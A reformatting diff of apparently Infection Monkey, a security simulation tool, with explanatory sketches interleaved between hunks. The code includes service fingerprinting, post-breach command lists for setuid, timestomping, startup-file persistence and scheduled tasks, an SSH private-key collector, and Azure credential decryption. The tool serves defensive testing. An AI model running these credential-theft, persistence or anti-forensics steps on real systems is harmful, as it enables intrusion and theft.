"An unknown socket error occurred while trying the mssql fingerprint, closing socket.",
"An unknown socket error occurred while trying the mssql fingerprint, "
"closing socket.",
exc_info=True,
)
sock.close()
@ -82,7 +81,8 @@ class MSSQLFinger(HostFinger):
if len(instance_info) > 1:
host.services[self._SCANNED_SERVICE][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
# Each instance's info is nested under its own name, if there are multiple instances
# Each instance's info is nested under its own name, if there are multiple
# instances
# each will appear under its own name
host.services[self._SCANNED_SERVICE][instance_info[1]][
instance_info[i - 1]
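A hedged sketch of the key/value pairing the loop above performs on a single SQL Server Browser response entry; the semicolon-separated key;value layout and the sample values are illustrative assumptions, not copied from this module.

def parse_instance_info(instance_info_str):
    # fields arrive as key;value;key;value;... with the instance name in slot 1
    fields = instance_info_str.split(";")
    instance = {}
    if len(fields) > 1:
        for i in range(1, len(fields), 2):
            instance[fields[i - 1]] = fields[i]
    return instance

# e.g. parse_instance_info("ServerName;MONKEY;InstanceName;SQLEXPRESS;tcp;1433")
# -> {"ServerName": "MONKEY", "InstanceName": "SQLEXPRESS", "tcp": "1433"}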

View File

@ -44,9 +44,11 @@ class NetworkScanner(object):
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
'inaccessible_subnets' config value. If so, all other subnets in the config value
shouldn't be accessible.
All these subnets are returned.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is
running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
@ -54,7 +56,8 @@ class NetworkScanner(object):
if NetworkScanner._is_any_ip_in_subnet(
[str(x) for x in self._ip_addresses], subnet_str
):
# If machine has IPs from 2 different subnets in the same group, there's no point checking the other
# If machine has IPs from 2 different subnets in the same group, there's no
# point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
@ -74,9 +77,12 @@ class NetworkScanner(object):
:param stop_callback: A callback to check at any point if we should stop scanning
:return: yields a sequence of VictimHost instances
"""
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
# However, the decision of what ITERATION_BLOCK_SIZE to use also requires balancing network usage (pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be
# the best decision
# However, the decision of what ITERATION_BLOCK_SIZE to use also requires balancing network
# usage (pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher
# than CPU core size
# But again, balance
pool = Pool(ITERATION_BLOCK_SIZE)
victim_generator = VictimHostGenerator(

View File

@ -59,7 +59,8 @@ class PingScanner(HostScanner, HostFinger):
ttl = int(regex_result.group(0))
if ttl <= LINUX_TTL:
host.os["type"] = "linux"
else:  # as far as we know, could also be OSX/BSD but let's handle that when it comes up.
else:  # as far as we know, could also be OSX/BSD but let's handle that when it
# comes up.
host.os["type"] = "windows"
host.icmp = True
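A minimal sketch of the TTL heuristic above, assuming the common defaults of 64 for Linux-like stacks and 128 for Windows; the actual LINUX_TTL constant is defined elsewhere in this file.

LINUX_TTL = 64  # assumed common default; the real constant lives elsewhere

def guess_os_from_ttl(reply_ttl: int) -> str:
    # replies with a TTL at or below 64 are treated as Linux, higher as Windows
    return "linux" if reply_ttl <= LINUX_TTL else "windows"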

View File

@ -17,21 +17,21 @@ class PostgreSQLFinger(HostFinger):
# Class related consts
_SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432
CREDS = {"username": ID_STRING, "password": ID_STRING}
CREDS = {"username":ID_STRING, "password":ID_STRING}
CONNECTION_DETAILS = {
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EX_SUBSTRINGS = {
"no_auth": "password authentication failed",
"no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
"no_auth":"password authentication failed",
"no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff
}
def get_host_fingerprint(self, host):
@ -51,12 +51,14 @@ class PostgreSQLFinger(HostFinger):
self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = (
"The PostgreSQL server was unexpectedly accessible with the credentials - "
+ f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?"
+ f"user: '{self.CREDS['username']}' and password: '"
f"{self.CREDS['password']}'. Is this a honeypot?"
)
return True
except psycopg2.OperationalError as ex:
# try block will throw an OperationalError since the credentials are wrong, which we then analyze
# try block will throw an OperationalError since the credentials are wrong, which we
# then analyze
try:
exception_string = str(ex)
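A hedged reconstruction of the analysis that follows the OperationalError above, pieced together from RELEVANT_EX_SUBSTRINGS and from the expected results in the test file further down this diff; treat it as a sketch of the idea, not the module's exact code. The client attempts an SSL and then a non-SSL connection, so the error text carries one relevant line (SSL not configured) or two (SSL configured), and each line reveals whether that connection type fails on authentication (open to all hosts) or on a missing pg_hba.conf entry (selected hosts only).

def analyze_operational_error(exception_string, details):
    # `details` stands for the CONNECTION_DETAILS mapping shown earlier in this diff
    lines = [ln for ln in exception_string.splitlines() if ln.strip()]
    findings = []

    def per_attempt(line, all_key, selected_key):
        if "password authentication failed" in line:
            findings.append(details[all_key])
        elif "entry for host" in line:
            findings.append(details[selected_key])

    if len(lines) == 1:
        # only the non-SSL attempt left an error line -> SSL is not configured
        findings.append(details["ssl_not_conf"])
        per_attempt(lines[0], "all_non_ssl", "selected_non_ssl")
    else:
        # first line is the SSL attempt, second line the non-SSL attempt
        findings.append(details["ssl_conf"])
        per_attempt(lines[0], "all_ssl", "selected_ssl")
        per_attempt(lines[1], "all_non_ssl", "selected_non_ssl")
        if findings[-2:] == [details["selected_ssl"], details["selected_non_ssl"]]:
            findings[-2:] = [details["only_selected"]]
    return findings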

View File

@ -68,14 +68,16 @@ class SMBNegoFingerData(Packet):
("separator1", b"\x02"),
(
"dialect1",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d"
b"\x20\x31\x2e\x30\x00",
),
("separator2", b"\x02"),
("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3", b"\x02"),
(
"dialect3",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72"
b"\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
),
("separator4", b"\x02"),
("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
@ -104,12 +106,18 @@ class SMBSessionFingerData(Packet):
("bcc1", ""),
(
"Data",
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c"
b"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00"
b"\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53"
b"\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20"
b"\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
b"\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
),
]
@ -161,7 +169,7 @@ class SMBFinger(HostFinger):
os_version, service_client = tuple(
[
e.replace(b"\x00", b"").decode()
for e in data[47 + length :].split(b"\x00\x00\x00")[:2]
for e in data[47 + length:].split(b"\x00\x00\x00")[:2]
]
)

View File

@ -22,7 +22,8 @@ class TcpScanner(HostScanner, HostFinger):
def get_host_fingerprint(self, host, only_one_port=False):
"""
Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration.
Scans a target host to see if it's alive using the tcp_target_ports specified in the
configuration.
:param host: VictimHost structure
:param only_one_port: Currently unused.
:return: T/F if there is at least one open port.

View File

@ -5,35 +5,35 @@ from infection_monkey.network.postgresql_finger import PostgreSQLFinger
IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string."
_RELEVANT_EXCEPTION_STRING_PARTS = {
"pwd_auth_failed": 'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"pwd_auth_failed":'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL on',
"ssl_off_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"ssl_off_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL off',
}
_RELEVANT_EXCEPTION_STRINGS = {
"pwd_auth_failed": _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found": _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed": "\n".join(
"pwd_auth_failed":_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found":_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"pwd_auth_failed_ssl_off_entry_not_found": "\n".join(
"pwd_auth_failed_ssl_off_entry_not_found":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
]
),
"ssl_on_entry_not_found_pwd_auth_failed": "\n".join(
"ssl_on_entry_not_found_pwd_auth_failed":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"ssl_on_entry_not_found_ssl_off_entry_not_found": "\n".join(
"ssl_on_entry_not_found_ssl_off_entry_not_found":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
@ -42,48 +42,48 @@ _RELEVANT_EXCEPTION_STRINGS = {
}
_RESULT_STRINGS = {
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = {
# SSL not configured, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]: [
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]:[
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["all_non_ssl"],
],
# SSL not configured, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]: [
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]:[
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["selected_non_ssl"],
],
# all SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]: [
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# all SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]: [
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["selected_non_ssl"],
],
# selected SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]: [
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["selected_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# selected SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]: [
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["only_selected"],
],

View File

@ -129,7 +129,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
possible_ports.append((port, sock))
continue
if err == 10035: # WSAEWOULDBLOCK is valid, see
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29.aspx?f=255&MSPPError=-2147217396
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29
# .aspx?f=255&MSPPError=-2147217396
possible_ports.append((port, sock))
continue
if err == 115: # EINPROGRESS 115 /* Operation now in progress */
@ -164,7 +165,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
readable_sockets, _, _ = select.select(
[s[1] for s in connected_ports_sockets], [], [], 0
)
# read first BANNER_READ bytes. We ignore errors because service might not send a decodable byte string.
# read first BANNER_READ bytes. We ignore errors because service might not send a
# decodable byte string.
banners = [
sock.recv(BANNER_READ).decode(errors="ignore")
if sock in readable_sockets
@ -209,7 +211,8 @@ def _get_traceroute_bin_path():
It's been built using the buildroot utility with the following settings:
* Statically link to musl and all other required libs
* Optimize for size
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure it behaves as expected
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure
it behaves as expected
:return: Path to traceroute executable
"""
@ -223,7 +226,8 @@ def _parse_traceroute(output, regex, ttl):
:param regex: Regex for finding an IP address
:param ttl: Max TTL. Must be the same as the TTL used as param for traceroute.
:return: List of ips which are the hops on the way to the traceroute destination.
If a hop's IP wasn't found by traceroute, instead of an IP, the array will contain None
If a hop's IP wasn't found by traceroute, instead of an IP, the array will
contain None
"""
ip_lines = output.split("\n")
trace_list = []
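A compact, hedged sketch of the non-blocking connect pattern that check_tcp_ports (partially shown above) is built around; the 115 (EINPROGRESS) and 10035 (WSAEWOULDBLOCK) constants mirror the errno checks in the hunk, while the rest is illustrative.

import select
import socket

def open_ports(ip, ports, timeout=3.0):
    pending = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setblocking(False)
        err = s.connect_ex((ip, port))
        if err in (0, 115, 10035):  # connected / EINPROGRESS / WSAEWOULDBLOCK
            pending.append((port, s))
        else:
            s.close()
    _, writable, _ = select.select([], [s for _, s in pending], [], timeout)
    result = []
    for port, s in pending:
        # a socket becomes writable once connect finished; SO_ERROR == 0 means success
        if s in writable and s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:
            result.append(port)
        s.close()
    return result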

View File

@ -27,7 +27,8 @@ logger = logging.getLogger(__name__)
class CommunicateAsNewUser(PBA):
"""
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a Zero Trust test of the
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a
Zero Trust test of the
People pillar. See the relevant telemetry processing to see what findings are created.
"""
@ -58,7 +59,8 @@ class CommunicateAsNewUser(PBA):
def get_commandline_for_http_request(url, is_windows=is_windows_os()):
if is_windows:
format_string = (
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; '
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = ['
"Net.SecurityProtocolType]::Tls12; "
'Invoke-WebRequest {url} -UseBasicParsing"'
)
else:
@ -79,7 +81,8 @@ class CommunicateAsNewUser(PBA):
"""
if exit_status == 0:
PostBreachTelem(
self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
self,
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send()
else:
PostBreachTelem(

View File

@ -9,5 +9,6 @@ class AccountDiscovery(PBA):
def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds),
windows_cmd=windows_cmds
)

View File

@ -28,7 +28,8 @@ class SignedScriptProxyExecution(PBA):
super().run()
except Exception as e:
LOG.warning(
f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
f"An exception occurred on running PBA "
f"{POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
)
finally:
cleanup_changes(original_comspec)

View File

@ -1,7 +1,9 @@
SCHEDULED_TASK_NAME = "monkey-spawn-cmd"
SCHEDULED_TASK_COMMAND = r"C:\windows\system32\cmd.exe"
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005
# /T1053.005.md
def get_windows_commands_to_schedule_jobs():

View File

@ -16,7 +16,8 @@ __author__ = "VakarisZ"
class PBA(Plugin):
"""
Post breach action object. Can be extended to support more than command execution on target machine.
Post breach action object. Can be extended to support more than command execution on target
machine.
"""
@staticmethod
@ -61,7 +62,8 @@ class PBA(Plugin):
result = exec_funct()
if self.scripts_were_used_successfully(result):
T1064Telem(
ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
ScanStatus.USED,
f"Scripts were used to execute {self.name} post breach action."
).send()
PostBreachTelem(self, result).send()
else:

View File

@ -1,11 +1,14 @@
TEMP_FILE = "$HOME/monkey-temp-file"
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001
# /T1548.001.md
def get_linux_commands_to_setuid_setgid():
return [
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&",
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s "
f"{TEMP_FILE} &&",
'echo "Successfully changed setuid/setgid bits" &&',
f"rm {TEMP_FILE}",
]

View File

@ -1,7 +1,9 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\
import (
get_linux_commands_to_modify_shell_startup_files,
)
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\
import (
get_windows_commands_to_modify_shell_startup_files,
)

View File

@ -19,13 +19,15 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [
"\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
)
for user in USERS
]
return [
"powershell.exe",
"infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1",
"infection_monkey/post_breach/shell_startup_files/windows"
"/modify_powershell_startup_file.ps1",
"-startup_file_path {0}",
], STARTUP_FILES_PER_USER

View File

@ -13,7 +13,7 @@ CUSTOM_WINDOWS_FILENAME = "filename-for-windows"
def fake_monkey_dir_path(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path",
lambda: MONKEY_DIR_PATH,
lambda:MONKEY_DIR_PATH,
)
@ -21,7 +21,7 @@ def fake_monkey_dir_path(monkeypatch):
def set_os_linux(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda: False,
lambda:False,
)
@ -29,7 +29,7 @@ def set_os_linux(monkeypatch):
def set_os_windows(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda: True,
lambda:True,
)
@ -75,7 +75,6 @@ def test_command_windows_custom_file_and_cmd(
@pytest.fixture
def mock_UsersPBA_linux_custom_file(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_linux_filename",
@ -91,7 +90,6 @@ def test_command_linux_custom_file(mock_UsersPBA_linux_custom_file):
@pytest.fixture
def mock_UsersPBA_windows_custom_file(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_windows_filename",
@ -107,7 +105,6 @@ def test_command_windows_custom_file(mock_UsersPBA_windows_custom_file):
@pytest.fixture
def mock_UsersPBA_linux_custom_cmd(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd",
CUSTOM_LINUX_CMD,
@ -123,7 +120,6 @@ def test_command_linux_custom_cmd(mock_UsersPBA_linux_custom_cmd):
@pytest.fixture
def mock_UsersPBA_windows_custom_cmd(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd",
CUSTOM_WINDOWS_CMD,

View File

@ -10,5 +10,5 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f"
]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -4,5 +4,5 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -1,5 +1,6 @@
def get_linux_trap_commands():
return [
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;", # trap and send SIGINT signal
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;",
# trap and send SIGINT signal
"trap - INT", # untrap SIGINT
]

View File

@ -6,7 +6,8 @@ __author__ = "itay.mizeretz"
def get_binaries_dir_path():
"""
Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise)
Gets the path to the binaries dir (files packaged in pyinstaller if it was used,
infection_monkey dir otherwise)
:return: Binaries dir path
"""
if getattr(sys, "frozen", False):
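A minimal sketch of the PyInstaller check in the line above, under the assumption that bundled files are read from sys._MEIPASS when the monkey runs as a frozen onefile binary; that is standard PyInstaller behaviour, though this diff does not show how the original resolves the path.

import os
import sys

def binaries_dir():
    if getattr(sys, "frozen", False):
        # PyInstaller extracts bundled files to a temporary dir exposed as _MEIPASS
        return sys._MEIPASS
    return os.path.dirname(os.path.abspath(__file__))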

View File

@ -38,11 +38,11 @@ class SSHCollector(object):
possibly hashed)
"""
return {
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
"known_hosts": None,
"name":name,
"home_dir":home_dir,
"public_key":None,
"private_key":None,
"known_hosts":None,
}
@staticmethod
@ -72,7 +72,8 @@ class SSHCollector(object):
try:
with open(public) as f:
info["public_key"] = f.read()
# By default private key has the same name as public, only without .pub
# By default private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
@ -83,7 +84,8 @@ class SSHCollector(object):
info["private_key"] = private_key
LOG.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
ScanStatus.USED, "SSH key",
"Path: %s" % private
).send()
else:
continue
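A hedged sketch of the public/private key pairing convention the hunk above relies on: the private key is assumed to sit next to the public one under the same name without the .pub extension (id_rsa.pub -> id_rsa).

import os

def private_key_path_for(public_key_path: str):
    # strip the ".pub" suffix and check whether the matching private key exists
    private = os.path.splitext(public_key_path)[0]
    return private if os.path.exists(private) else None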

View File

@ -29,7 +29,8 @@ class OperatingSystem(IntEnum):
class SystemInfoCollector(object):
"""
A class that checks the current operating system and calls system information collecting modules accordingly
A class that checks the current operating system and calls system information collecting
modules accordingly
"""
def __init__(self):
@ -79,8 +80,8 @@ class InfoCollector(object):
"""
LOG.debug("Reading subnets")
self.info["network_info"] = {
"networks": get_host_subnets(),
"netstat": NetstatCollector.get_netstat_info(),
"networks":get_host_subnets(),
"netstat":NetstatCollector.get_netstat_info(),
}
def get_azure_info(self):
@ -113,5 +114,6 @@ class InfoCollector(object):
self.info["Azure"] = {}
self.info["Azure"]["usernames"] = [cred[0] for cred in azure_creds]
except Exception:
# If we failed to collect azure info, no reason to fail all the collection. Log and continue.
# If we failed to collect azure info, no reason to fail all the collection. Log and
# continue.
LOG.error("Failed collecting Azure info.", exc_info=True)

View File

@ -97,7 +97,8 @@ class AzureCollector(object):
# we're going to do as much of this in PS as we can.
ps_block = ";\n".join(
[
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null',
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | '
"Out-Null",
'$base64 = "%s"' % protected_data,
"$content = [Convert]::FromBase64String($base64)",
"$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms",

View File

@ -31,7 +31,7 @@ class AwsCollector(SystemInfoCollector):
info = {}
if aws.is_instance():
logger.info("Machine is an AWS instance")
info = {"instance_id": aws.get_instance_id()}
